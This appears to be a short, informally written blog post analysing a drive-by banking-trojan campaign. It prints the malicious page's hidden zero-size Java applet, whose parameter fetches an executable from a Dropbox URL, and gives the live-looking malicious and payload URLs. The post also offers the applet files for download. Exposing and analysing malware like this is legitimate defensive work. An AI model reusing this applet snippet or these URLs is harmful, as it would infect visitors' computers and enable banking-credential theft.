89.17.220.220(banker hosted in Spain Barcelona Miarroba Networks S.l)

The method here is this:
the spanish or brasilian hecker uses java aplet to download and execute his banker into remote computers
the malicious url file is this:
http://pics24.fileave.com/

to find out how the banker is downloaded and excuted u have to download the index.html file via wget for windows
http://users.ugent.be/~bpuype/wget/#usage

after downloading the index.html file let’s have a look inside the code

<APPLET CODE = "Client.class" ARCHIVE = "Client.jar" WIDTH = "0" HEIGHT = "0">
<PARAM NAME = "AMLMAFOIEA" VALUE = "http://dl.dropbox.com/u/12138956/javaloader.exe">
</APPLET>

easy no ? the hecker send this url:http://pics24.fileave.com/ to potential victims and if they have java installed after runing the page they are automatically infected

this is threatexpert report:
http://www.threatexpert.com/report.aspx?md5=41a3fc3af67f51834d39fd819e408cbc

i let u download Client.jar and Client.class from the page

hosting infos:
http://whois.domaintools.com/89.17.220.220

Categories: Uncategorized